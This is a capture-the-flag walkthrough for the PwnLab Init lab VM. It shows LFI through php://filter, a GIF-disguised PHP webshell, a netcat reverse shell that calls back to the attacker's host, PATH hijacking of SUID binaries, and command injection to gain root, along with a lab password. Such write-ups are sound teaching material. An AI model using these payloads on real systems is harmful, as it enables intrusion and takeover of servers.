CTF: PwnLab Init Walkthrough
https://www.vulnhub.com/entry/pwnlab-init,158/
In this walkthrough, I’ll be using Parrot OS. I’ll break each vulnerability down and explain it. The video won’t demonstrate all of the techniques that could have been applied. I will also list the techniques I’ve learned from others.
Exploits / Techniques
- Local File Inclusions (LFI)
- Password Reuse
- Privilege Elevation through compiled code.
- Remote Code Execution
- Reverse Shell
- Spawning Interactive Shells
Pre-Attack
NetDiscover
First Identify the Virtual Machine (VM) server by using NetDiscover.
|
1 |
sudo netdiscover -r 192.168.1.0/24 |
Nikto
Use Nikto to scan the website for general information and exploits.
|
1 |
nikto --host 192.168.0.15 |
In the below results you can see the Nikto found the config.php file. We’ll get the database credentials out of that file.
Local File Inclusion
The actual code we will be exploiting will be an include that looks as if it’s supposed to load a language file through a cookie. There are comments that this code is unfinished.
|
1 2 3 4 |
if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } |
PHP Base Filter
This exploit uses the php://filter/convert.base64-encode conversion filter. This filter runs before the file is included. Since this filter encodes everything to base64 we are able to view files on the server before they are processed.
|
1 |
http://192.168.1.15/?page=php://filter/convert.base64-encode/resource=index |
Then we can get the configuration file which contains the MySQL database connection information.
|
1 |
http://192.168.1.15/?page=php://filter/convert.base64-encode/resource=config |
Uploading and Exploiting Using an Image
Create an image using vim and insert this into the .gif file.
|
1 2 |
GIF89; <?php system($_GET["cmd"]) ?> |
Then upload the image and retrieve the image path by right clicking and inspecting the image.
Using the Console in FireFox I was able to set the Cookie which loads the image on the website. This will allow us remote code execution.
/etc/passwd
Using the file inclusion we are able to enumerate the users on the host machine by returning the /etc/passwd.
Gaining Access to the MySQL Database
|
1 |
mysql -h 192.168.0.15 -u root -p |
Reverse Shell
The reverse shell is accomplished through the local file inclusion vulnerability.
|
1 |
nc -nvlp 4444 |
After Netcat is set up to listen on port 4444 you can paste the below code into the browser and it should pop a reverse shell.
Note: 192.168.0.15 is the virtual machine we are attacking. 192.168.0.14 is the host machine that I’m running Parrot OS on.
|
1 |
http://192.168.0.15/?cmd=nc -nv 192.168.0.14 4444 -e /bin/bash |
Spawn Interactive Shell
|
1 |
python -c 'import pty; pty.spawn("/bin/bash")' |
Privilege Elevation
This part is rather tricky. I had to have some help and followed Abatchy’s (Mohamed Shahat) technique on this one. His post is worth reading, he tries several other techniques and lists more information than this post.
https://www.abatchy.com/2016/11/pwnlab-init-walkthrough-vulnhub
Login as Kane
|
1 2 |
su kent Password: <code>JWzXuBJJNy |
In Kane’s home folder there is a msgmike file.
Upon inspecting the file you can see that something in the file runs something similar to “cat /home/mike/msg.txt”.
|
1 |
strings msgmike |
The actual exploit here is to create a shell script called cat and export it in the environmental variables that way it runs instead of the system’s cat program. This needs to be done in Kane’s folder.
|
1 2 3 4 |
echo "/bin/bash" > cat chmod 777 cat export PATH=/home/kane ./msgmike |
Will return something funny like “bash: dircolors: command not found”.
Then you need to reset your export PATH variable.
|
1 |
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin |
|
1 2 3 4 5 |
cd ../mike ls -al ./msg2root **opensesame; bash -p whoami |
Capture The Flag
